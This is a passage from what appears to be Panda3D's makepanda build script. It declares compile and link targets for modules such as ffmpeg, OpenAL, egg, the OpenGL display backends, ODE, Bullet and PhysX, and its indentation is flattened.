TargetAdd('libp3vrpn.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3vrpn.in', opts=['IMOD:panda3d.vrpn', 'ILIB:libp3vrpn', 'SRCDIR:panda/src/vrpn'])
TargetAdd('libp3vrpn_igate.obj', input='libp3vrpn.in', opts=["DEPENDENCYONLY"])
TargetAdd('vrpn_module.obj', input='libp3vrpn.in')
TargetAdd('vrpn_module.obj', opts=OPTS)
TargetAdd('vrpn_module.obj', opts=['IMOD:panda3d.vrpn', 'ILIB:vrpn', 'IMPORT:panda3d.core'])
TargetAdd('vrpn.pyd', input='vrpn_module.obj')
TargetAdd('vrpn.pyd', input='libp3vrpn_igate.obj')
TargetAdd('vrpn.pyd', input='libp3vrpn.dll')
TargetAdd('vrpn.pyd', input='libp3interrogatedb.dll')
TargetAdd('vrpn.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('vrpn.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/ffmpeg
#
if PkgSkip("FFMPEG") == 0 and not RUNTIME:
if not PkgSkip("SWSCALE"):
DefSymbol("FFMPEG", "HAVE_SWSCALE")
if not PkgSkip("SWRESAMPLE"):
DefSymbol("FFMPEG", "HAVE_SWRESAMPLE")
OPTS=['DIR:panda/src/ffmpeg', 'BUILDING:FFMPEG', 'FFMPEG', 'SWSCALE', 'SWRESAMPLE']
TargetAdd('p3ffmpeg_composite1.obj', opts=OPTS, input='p3ffmpeg_composite1.cxx', dep=[
'dtool_have_swscale.dat', 'dtool_have_swresample.dat'])
TargetAdd('libp3ffmpeg.dll', input='p3ffmpeg_composite1.obj')
TargetAdd('libp3ffmpeg.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3ffmpeg.dll', opts=OPTS)
#
# DIRECTORY: panda/src/audiotraits/
#
if PkgSkip("FMODEX") == 0 and not RUNTIME:
OPTS=['DIR:panda/src/audiotraits', 'BUILDING:FMOD_AUDIO', 'FMODEX']
TargetAdd('fmod_audio_fmod_audio_composite1.obj', opts=OPTS, input='fmod_audio_composite1.cxx')
TargetAdd('libp3fmod_audio.dll', input='fmod_audio_fmod_audio_composite1.obj')
TargetAdd('libp3fmod_audio.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3fmod_audio.dll', opts=['MODULE', 'ADVAPI', 'WINUSER', 'WINMM', 'FMODEX'])
if PkgSkip("OPENAL") == 0 and not RUNTIME:
OPTS=['DIR:panda/src/audiotraits', 'BUILDING:OPENAL_AUDIO', 'OPENAL']
TargetAdd('openal_audio_openal_audio_composite1.obj', opts=OPTS, input='openal_audio_composite1.cxx')
TargetAdd('libp3openal_audio.dll', input='openal_audio_openal_audio_composite1.obj')
TargetAdd('libp3openal_audio.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3openal_audio.dll', opts=['MODULE', 'ADVAPI', 'WINUSER', 'WINMM', 'WINSHELL', 'WINOLE', 'OPENAL'])
#
# DIRECTORY: panda/src/downloadertools/
#
if (PkgSkip("OPENSSL")==0 and not RTDIST and not RUNTIME and PkgSkip("DEPLOYTOOLS")==0):
OPTS=['DIR:panda/src/downloadertools', 'OPENSSL', 'ZLIB', 'ADVAPI', 'WINSOCK2', 'WINSHELL', 'WINGDI', 'WINUSER']
TargetAdd('apply_patch_apply_patch.obj', opts=OPTS, input='apply_patch.cxx')
TargetAdd('apply_patch.exe', input=['apply_patch_apply_patch.obj'])
TargetAdd('apply_patch.exe', input=COMMON_PANDA_LIBS)
TargetAdd('apply_patch.exe', opts=OPTS)
TargetAdd('build_patch_build_patch.obj', opts=OPTS, input='build_patch.cxx')
TargetAdd('build_patch.exe', input=['build_patch_build_patch.obj'])
TargetAdd('build_patch.exe', input=COMMON_PANDA_LIBS)
TargetAdd('build_patch.exe', opts=OPTS)
if not PkgSkip("ZLIB"):
TargetAdd('check_adler_check_adler.obj', opts=OPTS, input='check_adler.cxx')
TargetAdd('check_adler.exe', input=['check_adler_check_adler.obj'])
TargetAdd('check_adler.exe', input=COMMON_PANDA_LIBS)
TargetAdd('check_adler.exe', opts=OPTS)
TargetAdd('check_crc_check_crc.obj', opts=OPTS, input='check_crc.cxx')
TargetAdd('check_crc.exe', input=['check_crc_check_crc.obj'])
TargetAdd('check_crc.exe', input=COMMON_PANDA_LIBS)
TargetAdd('check_crc.exe', opts=OPTS)
TargetAdd('check_md5_check_md5.obj', opts=OPTS, input='check_md5.cxx')
TargetAdd('check_md5.exe', input=['check_md5_check_md5.obj'])
TargetAdd('check_md5.exe', input=COMMON_PANDA_LIBS)
TargetAdd('check_md5.exe', opts=OPTS)
TargetAdd('pdecrypt_pdecrypt.obj', opts=OPTS, input='pdecrypt.cxx')
TargetAdd('pdecrypt.exe', input=['pdecrypt_pdecrypt.obj'])
TargetAdd('pdecrypt.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pdecrypt.exe', opts=OPTS)
TargetAdd('pencrypt_pencrypt.obj', opts=OPTS, input='pencrypt.cxx')
TargetAdd('pencrypt.exe', input=['pencrypt_pencrypt.obj'])
TargetAdd('pencrypt.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pencrypt.exe', opts=OPTS)
TargetAdd('show_ddb_show_ddb.obj', opts=OPTS, input='show_ddb.cxx')
TargetAdd('show_ddb.exe', input=['show_ddb_show_ddb.obj'])
TargetAdd('show_ddb.exe', input=COMMON_PANDA_LIBS)
TargetAdd('show_ddb.exe', opts=OPTS)
#
# DIRECTORY: panda/src/downloadertools/
#
if (PkgSkip("ZLIB")==0 and not RTDIST and not RUNTIME and PkgSkip("DEPLOYTOOLS")==0):
OPTS=['DIR:panda/src/downloadertools', 'ZLIB', 'OPENSSL', 'ADVAPI', 'WINSOCK2', 'WINSHELL', 'WINGDI', 'WINUSER']
TargetAdd('multify_multify.obj', opts=OPTS, input='multify.cxx')
TargetAdd('multify.exe', input=['multify_multify.obj'])
TargetAdd('multify.exe', input=COMMON_PANDA_LIBS)
TargetAdd('multify.exe', opts=OPTS)
TargetAdd('pzip_pzip.obj', opts=OPTS, input='pzip.cxx')
TargetAdd('pzip.exe', input=['pzip_pzip.obj'])
TargetAdd('pzip.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pzip.exe', opts=OPTS)
TargetAdd('punzip_punzip.obj', opts=OPTS, input='punzip.cxx')
TargetAdd('punzip.exe', input=['punzip_punzip.obj'])
TargetAdd('punzip.exe', input=COMMON_PANDA_LIBS)
TargetAdd('punzip.exe', opts=OPTS)
#
# DIRECTORY: panda/src/windisplay/
#
if (GetTarget() == 'windows' and not RUNTIME):
OPTS=['DIR:panda/src/windisplay', 'BUILDING:PANDAWIN']
TargetAdd('p3windisplay_composite1.obj', opts=OPTS+["BIGOBJ"], input='p3windisplay_composite1.cxx')
TargetAdd('p3windisplay_windetectdx9.obj', opts=OPTS + ["DX9"], input='winDetectDx9.cxx')
TargetAdd('libp3windisplay.dll', input='p3windisplay_composite1.obj')
TargetAdd('libp3windisplay.dll', input='p3windisplay_windetectdx9.obj')
TargetAdd('libp3windisplay.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3windisplay.dll', opts=['WINIMM', 'WINGDI', 'WINKERNEL', 'WINOLDNAMES', 'WINUSER', 'WINMM',"BIGOBJ"])
#
# DIRECTORY: panda/metalibs/pandadx9/
#
if GetTarget() == 'windows' and PkgSkip("DX9")==0 and not RUNTIME:
OPTS=['DIR:panda/src/dxgsg9', 'BUILDING:PANDADX', 'DX9', 'NVIDIACG', 'CGDX9']
TargetAdd('p3dxgsg9_dxGraphicsStateGuardian9.obj', opts=OPTS, input='dxGraphicsStateGuardian9.cxx')
TargetAdd('p3dxgsg9_composite1.obj', opts=OPTS, input='p3dxgsg9_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandadx9', 'BUILDING:PANDADX', 'DX9', 'NVIDIACG', 'CGDX9']
TargetAdd('pandadx9_pandadx9.obj', opts=OPTS, input='pandadx9.cxx')
TargetAdd('libpandadx9.dll', input='pandadx9_pandadx9.obj')
TargetAdd('libpandadx9.dll', input='p3dxgsg9_dxGraphicsStateGuardian9.obj')
TargetAdd('libpandadx9.dll', input='p3dxgsg9_composite1.obj')
TargetAdd('libpandadx9.dll', input='libp3windisplay.dll')
TargetAdd('libpandadx9.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandadx9.dll', opts=['MODULE', 'ADVAPI', 'WINGDI', 'WINKERNEL', 'WINUSER', 'WINMM', 'DX9', 'NVIDIACG', 'CGDX9'])
#
# DIRECTORY: panda/src/egg/
#
if not RUNTIME and not PkgSkip("EGG"):
OPTS=['DIR:panda/src/egg', 'BUILDING:PANDAEGG', 'ZLIB', 'BISONPREFIX_eggyy', 'FLEXDASHI']
CreateFile(GetOutputDir()+"/include/parser.h")
TargetAdd('p3egg_parser.obj', opts=OPTS, input='parser.yxx')
TargetAdd('parser.h', input='p3egg_parser.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3egg_lexer.obj', opts=OPTS, input='lexer.lxx')
TargetAdd('p3egg_composite1.obj', opts=OPTS, input='p3egg_composite1.cxx')
TargetAdd('p3egg_composite2.obj', opts=OPTS, input='p3egg_composite2.cxx')
OPTS=['DIR:panda/src/egg', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/egg', ["*.h", "*_composite*.cxx"])
if "parser.h" in IGATEFILES: IGATEFILES.remove("parser.h")
TargetAdd('libp3egg.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3egg.in', opts=['IMOD:panda3d.egg', 'ILIB:libp3egg', 'SRCDIR:panda/src/egg'])
TargetAdd('libp3egg_igate.obj', input='libp3egg.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3egg_eggGroupNode_ext.obj', opts=OPTS, input='eggGroupNode_ext.cxx')
#
# DIRECTORY: panda/src/egg2pg/
#
if not RUNTIME and not PkgSkip("EGG"):
OPTS=['DIR:panda/src/egg2pg', 'BUILDING:PANDAEGG']
TargetAdd('p3egg2pg_composite1.obj', opts=OPTS, input='p3egg2pg_composite1.cxx')
TargetAdd('p3egg2pg_composite2.obj', opts=OPTS, input='p3egg2pg_composite2.cxx')
OPTS=['DIR:panda/src/egg2pg', 'PYTHON']
IGATEFILES=['load_egg_file.h']
TargetAdd('libp3egg2pg.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3egg2pg.in', opts=['IMOD:panda3d.egg', 'ILIB:libp3egg2pg', 'SRCDIR:panda/src/egg2pg'])
TargetAdd('libp3egg2pg_igate.obj', input='libp3egg2pg.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/framework/
#
if (not RUNTIME):
deps = []
# Framework wants to link in a renderer when building statically, so tell it what is available.
if GetLinkAllStatic():
deps = ['dtool_have_gl.dat', 'dtool_have_tinydisplay.dat', 'dtool_have_egg.dat']
if not PkgSkip("GL"):
DefSymbol("FRAMEWORK", "HAVE_GL")
if not PkgSkip("TINYDISPLAY"):
DefSymbol("FRAMEWORK", "HAVE_TINYDISPLAY")
if not PkgSkip("EGG"):
DefSymbol("FRAMEWORK", "HAVE_EGG")
OPTS=['DIR:panda/src/framework', 'BUILDING:FRAMEWORK', 'FRAMEWORK']
TargetAdd('p3framework_composite1.obj', opts=OPTS, input='p3framework_composite1.cxx', dep=deps)
TargetAdd('libp3framework.dll', input='p3framework_composite1.obj')
TargetAdd('libp3framework.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3framework.dll', opts=['ADVAPI'])
#
# DIRECTORY: panda/src/glgsg/
#
if (not RUNTIME and PkgSkip("GL")==0):
OPTS=['DIR:panda/src/glgsg', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG']
TargetAdd('p3glgsg_config_glgsg.obj', opts=OPTS, input='config_glgsg.cxx')
TargetAdd('p3glgsg_glgsg.obj', opts=OPTS, input='glgsg.cxx')
#
# DIRECTORY: panda/src/glesgsg/
#
if (not RUNTIME and PkgSkip("GLES")==0):
OPTS=['DIR:panda/src/glesgsg', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES', 'GLES']
TargetAdd('p3glesgsg_config_glesgsg.obj', opts=OPTS, input='config_glesgsg.cxx')
TargetAdd('p3glesgsg_glesgsg.obj', opts=OPTS, input='glesgsg.cxx')
#
# DIRECTORY: panda/src/gles2gsg/
#
if (not RUNTIME and PkgSkip("GLES2")==0):
OPTS=['DIR:panda/src/gles2gsg', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES2', 'GLES2']
TargetAdd('p3gles2gsg_config_gles2gsg.obj', opts=OPTS, input='config_gles2gsg.cxx')
TargetAdd('p3gles2gsg_gles2gsg.obj', opts=OPTS, input='gles2gsg.cxx')
#
# DIRECTORY: panda/metalibs/pandaegg/
#
if not RUNTIME and not PkgSkip("EGG"):
OPTS=['DIR:panda/metalibs/pandaegg', 'DIR:panda/src/egg', 'BUILDING:PANDAEGG']
TargetAdd('pandaegg_pandaegg.obj', opts=OPTS, input='pandaegg.cxx')
TargetAdd('libpandaegg.dll', input='pandaegg_pandaegg.obj')
TargetAdd('libpandaegg.dll', input='p3egg2pg_composite1.obj')
TargetAdd('libpandaegg.dll', input='p3egg2pg_composite2.obj')
TargetAdd('libpandaegg.dll', input='p3egg_composite1.obj')
TargetAdd('libpandaegg.dll', input='p3egg_composite2.obj')
TargetAdd('libpandaegg.dll', input='p3egg_parser.obj')
TargetAdd('libpandaegg.dll', input='p3egg_lexer.obj')
TargetAdd('libpandaegg.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaegg.dll', opts=['ADVAPI'])
OPTS=['DIR:panda/metalibs/pandaegg', 'DIR:panda/src/egg', 'PYTHON']
TargetAdd('egg_module.obj', input='libp3egg2pg.in')
TargetAdd('egg_module.obj', input='libp3egg.in')
TargetAdd('egg_module.obj', opts=OPTS)
TargetAdd('egg_module.obj', opts=['IMOD:panda3d.egg', 'ILIB:egg', 'IMPORT:panda3d.core'])
TargetAdd('egg.pyd', input='egg_module.obj')
TargetAdd('egg.pyd', input='p3egg_eggGroupNode_ext.obj')
TargetAdd('egg.pyd', input='libp3egg_igate.obj')
TargetAdd('egg.pyd', input='libp3egg2pg_igate.obj')
TargetAdd('egg.pyd', input='libpandaegg.dll')
TargetAdd('egg.pyd', input='libp3interrogatedb.dll')
TargetAdd('egg.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('egg.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/x11display/
#
if (GetTarget() not in ['windows', 'darwin'] and PkgSkip("X11")==0 and not RUNTIME):
OPTS=['DIR:panda/src/x11display', 'BUILDING:PANDAX11', 'X11']
TargetAdd('p3x11display_composite1.obj', opts=OPTS, input='p3x11display_composite1.cxx')
#
# DIRECTORY: panda/src/glxdisplay/
#
if (GetTarget() not in ['windows', 'darwin'] and PkgSkip("GL")==0 and PkgSkip("X11")==0 and not RUNTIME):
OPTS=['DIR:panda/src/glxdisplay', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('p3glxdisplay_composite1.obj', opts=OPTS, input='p3glxdisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagl', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('pandagl_pandagl.obj', opts=OPTS, input='pandagl.cxx')
TargetAdd('libpandagl.dll', input='p3x11display_composite1.obj')
TargetAdd('libpandagl.dll', input='pandagl_pandagl.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_config_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glxdisplay_composite1.obj')
TargetAdd('libpandagl.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagl.dll', opts=['MODULE', 'GL', 'NVIDIACG', 'CGGL', 'X11'])
#
# DIRECTORY: panda/src/cocoadisplay/
#
if (GetTarget() == 'darwin' and PkgSkip("COCOA")==0 and PkgSkip("GL")==0 and not RUNTIME):
OPTS=['DIR:panda/src/cocoadisplay', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('p3cocoadisplay_composite1.obj', opts=OPTS, input='p3cocoadisplay_composite1.mm')
OPTS=['DIR:panda/metalibs/pandagl', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('pandagl_pandagl.obj', opts=OPTS, input='pandagl.cxx')
TargetAdd('libpandagl.dll', input='pandagl_pandagl.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_config_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3cocoadisplay_composite1.obj')
if (PkgSkip('PANDAFX')==0):
TargetAdd('libpandagl.dll', input='libpandafx.dll')
TargetAdd('libpandagl.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagl.dll', opts=['MODULE', 'GL', 'NVIDIACG', 'CGGL', 'COCOA', 'CARBON'])
#
# DIRECTORY: panda/src/osxdisplay/
#
elif (GetTarget() == 'darwin' and PkgSkip("CARBON")==0 and PkgSkip("GL")==0 and not RUNTIME):
OPTS=['DIR:panda/src/osxdisplay', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('p3osxdisplay_composite1.obj', opts=OPTS, input='p3osxdisplay_composite1.cxx')
TargetAdd('p3osxdisplay_osxGraphicsWindow.obj', opts=OPTS, input='osxGraphicsWindow.mm')
OPTS=['DIR:panda/metalibs/pandagl', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('pandagl_pandagl.obj', opts=OPTS, input='pandagl.cxx')
TargetAdd('libpandagl.dll', input='pandagl_pandagl.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_config_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3osxdisplay_composite1.obj')
TargetAdd('libpandagl.dll', input='p3osxdisplay_osxGraphicsWindow.obj')
if (PkgSkip('PANDAFX')==0):
TargetAdd('libpandagl.dll', input='libpandafx.dll')
TargetAdd('libpandagl.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagl.dll', opts=['MODULE', 'GL', 'NVIDIACG', 'CGGL', 'CARBON', 'AGL', 'COCOA'])
#
# DIRECTORY: panda/src/wgldisplay/
#
if (GetTarget() == 'windows' and PkgSkip("GL")==0 and not RUNTIME):
OPTS=['DIR:panda/src/wgldisplay', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGL', 'NVIDIACG', 'CGGL']
TargetAdd('p3wgldisplay_composite1.obj', opts=OPTS, input='p3wgldisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagl', 'BUILDING:PANDAGL', 'NVIDIACG', 'CGGL']
TargetAdd('pandagl_pandagl.obj', opts=OPTS, input='pandagl.cxx')
TargetAdd('libpandagl.dll', input='pandagl_pandagl.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_config_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3wgldisplay_composite1.obj')
TargetAdd('libpandagl.dll', input='libp3windisplay.dll')
if (PkgSkip('PANDAFX')==0):
TargetAdd('libpandagl.dll', input='libpandafx.dll')
TargetAdd('libpandagl.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagl.dll', opts=['MODULE', 'WINGDI', 'GL', 'WINKERNEL', 'WINOLDNAMES', 'WINUSER', 'WINMM', 'NVIDIACG', 'CGGL'])
#
# DIRECTORY: panda/src/egldisplay/
#
if (PkgSkip("EGL")==0 and PkgSkip("GLES")==0 and PkgSkip("X11")==0 and not RUNTIME):
DefSymbol('GLES', 'OPENGLES_1', '')
OPTS=['DIR:panda/src/egldisplay', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES', 'GLES', 'EGL']
TargetAdd('pandagles_egldisplay_composite1.obj', opts=OPTS, input='p3egldisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagles', 'BUILDING:PANDAGLES', 'GLES', 'EGL']
TargetAdd('pandagles_pandagles.obj', opts=OPTS, input='pandagles.cxx')
TargetAdd('libpandagles.dll', input='p3x11display_composite1.obj')
TargetAdd('libpandagles.dll', input='pandagles_pandagles.obj')
TargetAdd('libpandagles.dll', input='p3glesgsg_config_glesgsg.obj')
TargetAdd('libpandagles.dll', input='p3glesgsg_glesgsg.obj')
TargetAdd('libpandagles.dll', input='pandagles_egldisplay_composite1.obj')
TargetAdd('libpandagles.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagles.dll', opts=['MODULE', 'GLES', 'EGL', 'X11'])
#
# DIRECTORY: panda/src/egldisplay/
#
if (PkgSkip("EGL")==0 and PkgSkip("GLES2")==0 and PkgSkip("X11")==0 and not RUNTIME):
DefSymbol('GLES2', 'OPENGLES_2', '')
OPTS=['DIR:panda/src/egldisplay', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES2', 'GLES2', 'EGL']
TargetAdd('pandagles2_egldisplay_composite1.obj', opts=OPTS, input='p3egldisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagles2', 'BUILDING:PANDAGLES2', 'GLES2', 'EGL']
TargetAdd('pandagles2_pandagles2.obj', opts=OPTS, input='pandagles2.cxx')
TargetAdd('libpandagles2.dll', input='p3x11display_composite1.obj')
TargetAdd('libpandagles2.dll', input='pandagles2_pandagles2.obj')
TargetAdd('libpandagles2.dll', input='p3gles2gsg_config_gles2gsg.obj')
TargetAdd('libpandagles2.dll', input='p3gles2gsg_gles2gsg.obj')
TargetAdd('libpandagles2.dll', input='pandagles2_egldisplay_composite1.obj')
TargetAdd('libpandagles2.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagles2.dll', opts=['MODULE', 'GLES2', 'EGL', 'X11'])
#
# DIRECTORY: panda/src/ode/
#
if (PkgSkip("ODE")==0 and not RUNTIME):
OPTS=['DIR:panda/src/ode', 'BUILDING:PANDAODE', 'ODE', 'PYTHON']
TargetAdd('p3ode_composite1.obj', opts=OPTS, input='p3ode_composite1.cxx')
TargetAdd('p3ode_composite2.obj', opts=OPTS, input='p3ode_composite2.cxx')
TargetAdd('p3ode_composite3.obj', opts=OPTS, input='p3ode_composite3.cxx')
OPTS=['DIR:panda/src/ode', 'ODE', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/ode', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("odeConvexGeom.h")
IGATEFILES.remove("odeHeightFieldGeom.h")
IGATEFILES.remove("odeHelperStructs.h")
TargetAdd('libpandaode.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandaode.in', opts=['IMOD:panda3d.ode', 'ILIB:libpandaode', 'SRCDIR:panda/src/ode'])
TargetAdd('libpandaode_igate.obj', input='libpandaode.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3ode_ext_composite.obj', opts=OPTS, input='p3ode_ext_composite.cxx')
#
# DIRECTORY: panda/metalibs/pandaode/
#
if (PkgSkip("ODE")==0 and not RUNTIME):
OPTS=['DIR:panda/metalibs/pandaode', 'BUILDING:PANDAODE', 'ODE']
TargetAdd('pandaode_pandaode.obj', opts=OPTS, input='pandaode.cxx')
TargetAdd('libpandaode.dll', input='pandaode_pandaode.obj')
TargetAdd('libpandaode.dll', input='p3ode_composite1.obj')
TargetAdd('libpandaode.dll', input='p3ode_composite2.obj')
TargetAdd('libpandaode.dll', input='p3ode_composite3.obj')
TargetAdd('libpandaode.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaode.dll', opts=['WINUSER', 'ODE'])
OPTS=['DIR:panda/metalibs/pandaode', 'ODE', 'PYTHON']
TargetAdd('ode_module.obj', input='libpandaode.in')
TargetAdd('ode_module.obj', opts=OPTS)
TargetAdd('ode_module.obj', opts=['IMOD:panda3d.ode', 'ILIB:ode', 'IMPORT:panda3d.core'])
TargetAdd('ode.pyd', input='ode_module.obj')
TargetAdd('ode.pyd', input='libpandaode_igate.obj')
TargetAdd('ode.pyd', input='p3ode_ext_composite.obj')
TargetAdd('ode.pyd', input='libpandaode.dll')
TargetAdd('ode.pyd', input='libp3interrogatedb.dll')
TargetAdd('ode.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('ode.pyd', opts=['PYTHON', 'WINUSER', 'ODE'])
#
# DIRECTORY: panda/src/bullet/
#
if (PkgSkip("BULLET")==0 and not RUNTIME):
OPTS=['DIR:panda/src/bullet', 'BUILDING:PANDABULLET', 'BULLET']
TargetAdd('p3bullet_composite.obj', opts=OPTS, input='p3bullet_composite.cxx')
OPTS=['DIR:panda/src/bullet', 'BULLET', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/bullet', ["*.h", "*_composite*.cxx"])
TargetAdd('libpandabullet.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandabullet.in', opts=['IMOD:panda3d.bullet', 'ILIB:libpandabullet', 'SRCDIR:panda/src/bullet'])
TargetAdd('libpandabullet_igate.obj', input='libpandabullet.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/pandabullet/
#
if (PkgSkip("BULLET")==0 and not RUNTIME):
OPTS=['DIR:panda/metalibs/pandabullet', 'BUILDING:PANDABULLET', 'BULLET']
TargetAdd('pandabullet_pandabullet.obj', opts=OPTS, input='pandabullet.cxx')
TargetAdd('libpandabullet.dll', input='pandabullet_pandabullet.obj')
TargetAdd('libpandabullet.dll', input='p3bullet_composite.obj')
TargetAdd('libpandabullet.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandabullet.dll', opts=['WINUSER', 'BULLET'])
OPTS=['DIR:panda/metalibs/pandabullet', 'BULLET', 'PYTHON']
TargetAdd('bullet_module.obj', input='libpandabullet.in')
TargetAdd('bullet_module.obj', opts=OPTS)
TargetAdd('bullet_module.obj', opts=['IMOD:panda3d.bullet', 'ILIB:bullet', 'IMPORT:panda3d.core'])
TargetAdd('bullet.pyd', input='bullet_module.obj')
TargetAdd('bullet.pyd', input='libpandabullet_igate.obj')
TargetAdd('bullet.pyd', input='libpandabullet.dll')
TargetAdd('bullet.pyd', input='libp3interrogatedb.dll')
TargetAdd('bullet.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('bullet.pyd', opts=['PYTHON', 'WINUSER', 'BULLET'])
#
# DIRECTORY: panda/src/physx/
#
if (PkgSkip("PHYSX")==0):
OPTS=['DIR:panda/src/physx', 'BUILDING:PANDAPHYSX', 'PHYSX', 'NOARCH:PPC', 'PYTHON']
TargetAdd('p3physx_composite.obj', opts=OPTS, input='p3physx_composite.cxx')
OPTS=['DIR:panda/src/physx', 'PHYSX', 'NOARCH:PPC', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/physx', ["*.h", "*_composite*.cxx"])
TargetAdd('libpandaphysx.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandaphysx.in', opts=['IMOD:panda3d.physx', 'ILIB:libpandaphysx', 'SRCDIR:panda/src/physx'])
TargetAdd('libpandaphysx_igate.obj', input='libpandaphysx.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/pandaphysx/
#
if (PkgSkip("PHYSX")==0):
OPTS=['DIR:panda/metalibs/pandaphysx', 'BUILDING:PANDAPHYSX', 'PHYSX', 'NOARCH:PPC']
TargetAdd('pandaphysx_pandaphysx.obj', opts=OPTS, input='pandaphysx.cxx')
TargetAdd('libpandaphysx.dll', input='pandaphysx_pandaphysx.obj')
TargetAdd('libpandaphysx.dll', input='p3physx_composite.obj')
TargetAdd('libpandaphysx.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaphysx.dll', opts=['WINUSER', 'PHYSX', 'NOARCH:PPC', 'PYTHON'])
OPTS=['DIR:panda/metalibs/pandaphysx', 'PHYSX', 'NOARCH:PPC', 'PYTHON']
TargetAdd('physx_module.obj', input='libpandaphysx.in')
TargetAdd('physx_module.obj', opts=OPTS)
TargetAdd('physx_module.obj', opts=['IMOD:panda3d.physx', 'ILIB:physx', 'IMPORT:panda3d.core'])
TargetAdd('physx.pyd', input='physx_module.obj')
TargetAdd('physx.pyd', input='libpandaphysx_igate.obj')
TargetAdd('physx.pyd', input='libpandaphysx.dll')
TargetAdd('physx.pyd', input='libp3interrogatedb.dll')
TargetAdd('physx.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('physx.pyd', opts=['PYTHON', 'WINUSER', 'PHYSX', 'NOARCH:PPC'])
#
# DIRECTORY: panda/src/physics/
#
if (PkgSkip("PANDAPHYSICS")==0) and (not RUNTIME):
OPTS=['DIR:panda/src/physics', 'BUILDING:PANDAPHYSICS']
TargetAdd('p3physics_composite1.obj', opts=OPTS, input='p3physics_composite1.cxx')
TargetAdd('p3physics_composite2.obj', opts=OPTS, input='p3physics_composite2.cxx')
OPTS=['DIR:panda/src/physics', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/physics', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("forces.h")
TargetAdd('libp3physics.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3physics.in', opts=['IMOD:panda3d.physics', 'ILIB:libp3physics', 'SRCDIR:panda/src/physics'])
TargetAdd('libp3physics_igate.obj', input='libp3physics.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/particlesystem/
#
if (PkgSkip("PANDAPHYSICS")==0) and (PkgSkip("PANDAPARTICLESYSTEM")==0) and (not RUNTIME):
OPTS=['DIR:panda/src/particlesystem', 'BUILDING:PANDAPHYSICS']
TargetAdd('p3particlesystem_composite1.obj', opts=OPTS, input='p3particlesystem_composite1.cxx')
TargetAdd('p3particlesystem_composite2.obj', opts=OPTS, input='p3particlesystem_composite2.cxx')
